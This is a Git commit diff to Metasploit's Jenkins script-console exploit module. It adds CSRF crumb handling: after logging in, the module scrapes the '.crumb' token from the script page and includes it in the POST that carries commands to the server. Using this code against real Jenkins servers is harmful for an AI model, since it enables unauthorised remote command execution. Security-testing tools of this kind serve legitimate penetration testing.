Land rapid7#4020, Jenkins-CI CSRF token support

zeroSteiner · zeroSteiner · commit f886ab6f97ad · 2014-10-20T19:03:24.000-04:00
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -80,6 +80,7 @@ def http_send_command(cmd, opts = {})
         }
     }
     request_parameters['cookie'] = @cookie if @cookie != nil
+    request_parameters['vars_post']['.crumb'] = @crumb if @crumb != nil
     res = send_request_cgi(request_parameters)
     if not (res and res.code == 200)
       fail_with(Failure::Unknown, 'Failed to execute the command.')
@@ -135,7 +136,6 @@ def linux_stager
     @to_delete = "/tmp/#{file}"
   end
 
-
   def exploit
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
@@ -145,6 +145,7 @@ def exploit
     fail_with(Failure::Unknown) if not res
 
     @cookie = nil
+    @crumb = nil
     if res.code != 200
       print_status('Logging in...')
       res = send_request_cgi({
@@ -159,14 +160,22 @@ def exploit
       })
 
       if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
-        fail_with(Failure::NoAccess, 'login failed')
+        fail_with(Failure::NoAccess, 'Login failed')
       end
       sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
       @cookie = "#{sessionid}"
+
+      res = send_request_cgi({'uri' => "#{@uri.path}script", 'cookie' => @cookie})
+      fail_with(Failure::Unknown) unless res and res.code == 200
     else
       print_status('No authentication required, skipping login...')
     end
 
+    if (res.body =~ /"\.crumb", "([a-z0-9]*)"/)
+        print_status("Using CSRF token: '#{$1}'");
+        @crumb = $1;
+    end
+
     case target['Platform']
     when 'win'
       print_status("#{rhost}:#{rport} - Sending command stager...")
